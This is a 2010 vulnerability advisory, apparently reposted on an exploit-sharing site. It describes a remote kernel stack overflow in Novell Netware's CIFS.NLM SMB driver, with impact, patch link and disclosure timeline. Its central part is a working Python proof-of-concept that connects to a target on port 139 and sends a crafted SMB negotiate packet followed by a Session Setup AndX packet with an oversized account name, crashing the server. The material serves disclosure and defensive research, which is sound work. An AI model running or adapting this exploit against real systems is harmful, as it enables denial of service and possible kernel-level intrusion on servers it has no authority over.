Netware SMB Remote Stack Overflow PoC

2010-06-17T00:00:00
ID 1337DAY-ID-12757
Type zdt
Reporter Laurent Gaffie
Modified 2010-06-17T00:00:00

Description

Exploit for novell platform in category dos / poc

                                        
                                            =====================================
Netware SMB Remote Stack Overflow PoC
=====================================


Title:           Netware SMB Remote Stack Overflow
Version:         1.0
Issue type:      Stack Overflow
Affected vendor: Novell
Release date:    17/06/2010
Discovered by:   Laurent Gaffi?
Issue status:    Patch available
 
===============================================================================
 
Summary
-------
 
A vulnerability exists in the Netware CIFS.NLM driver which allows an attacker
to trigger a kernel stack overflow by sending a specific 'Sessions Setup AndX'
query. Successful exploitation of this issue will result in remote code
execution with kernel privileges. Failed attempts may result in a remote denial
of service.
 
 
Description
-----------
The Server Message Block (SMB) protocol, also known as Common Internet File
System (CIFS) acts as an application-layer protocol to provide shared access
to files, printers and Inter-Process Communication (IPC). It is also a transport
for Distributed Computing Environment / Remote Procedure Call (DCE / RPC)
operations.After negotiating a SMB communication the client sends a
'Session Setup AndX' packet to negotiate a session, to be able to connect on a
specific share. By sending a specially crafted request packet containing a long
'AccountName' value, it is possible trigger a kernel stack overflow.
 
 
Impact
------
 
A remote attacker may be able to remotely execute code with kernel privileges
on affected Netware systems. Failed attempts will result in a denial of service.
 
 
Affected products
-----------------
 
Netware version 6.5 SP8 and prior.
 
 
Proof of concept
----------------
 
import sys,socket
from socket import *
 
if len(sys.argv)<=1:   
 sys.exit('usage: python netware.py IP_ADDR')
 
host = sys.argv[1],139
payload = "A" * 200
 
packetnego=(
"\x00\x00\x00\x9a"
"\xff\x53\x4d\x42\x72\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc3\x15\x00\x00"
"\x01\x3d\x00\x77\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52"
"\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02"
"\x4d\x49\x43\x52\x4f\x53\x4f\x46\x54\x20\x4e\x45\x54\x29\x4f"
"\x52\x4b\x53\x20\x33\x2e\x30\x00\x02\x44\x4f\x53\x20\x4c\x4d"
"\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x44\x4f\x53\x20\x4c\x41"
"\x4e\x4d\x20\x4e\x32\x2e\x31\x00\x02\x57\x69\x6e\x64\x6f\x77"
"\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70"
"\x73\x20\x33\x2e\x31\x61\x00\x02\x4e\x54\x20\x4c\x4d\x20\x30"
"\x2e\x31\x32\x00"
)
 
packetsession=(
"\x00\x00\x01\x3e"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf9\x19\x01\x00\x81\x61"
"\x0d\x75\x00\x7a\x00\x68\x0b\x32\x00\x00\x00\x00\x00\x00\x00\x18"
"\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x3d\x00\x28\xd4\xce"
"\xd7\x93\xc8\x8b\x16\x5f\x42\x2a\x7a\xfd\x15\x7a\xfd\x15\x7a\xfd"+payload+
"\xef\xa5\x42\x5e\x5c\x2d\x4b\x1a\x1c\x59\x4f\x00\x57\x4f\x52\x4b"
"\x47\x52\x4f\x55\x50\x00\x57\x69\x6e\x64\x6f\x77\x73\x20\x34\x2e"
"\x30\x00\x57\x69\x6e\x64\x6f\x77\x73\x20\x34\x2e\x30\x00\x04\xff"
"\x00\x00\x00\x02\x00\x01\x00\x1f\x00\x00\x5c\x5c\x57\x49\x4e\x2d"
"\x45\x37\x4a\x30\x4f\x4e\x49\x4d\x53\x45\x33\x5c\x55\x53\x45\x52"
"\x53\x00\x3f\x3f\x3f\x3f\x3f\x00"
)
 
## chained Session Setup Andx, tree connect command, field = username, basic stack overflow.
 
s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.send(''.join(packetnego))
s.send(''.join(packetsession))
print "done !"
 
 
Solution
--------
 
Apply NSS update located at:
* http://download.novell.com/Download?buildid=tMWCI1cdI7s~
 
This patch has not been verified by stratsec.
 
 
Response timeline
-----------------
 
* 07/02/2010 - Issue discovered.
* 10/02/2010 - Vendor notified.
* 10/02/2010 - Vendor acknowledged receipt of advisory.
* 11/02/2010 - Vendor confirmed issue presence.
* 16/06/2010 - Patch released by vendor.
* 17/06/2010 - stratsec advisory published.
 
References
----------
 
* Vendor advisory: http://download.novell.com/Download?buildid=tMWCI1cdI7s~



#  0day.today [2018-01-09]  #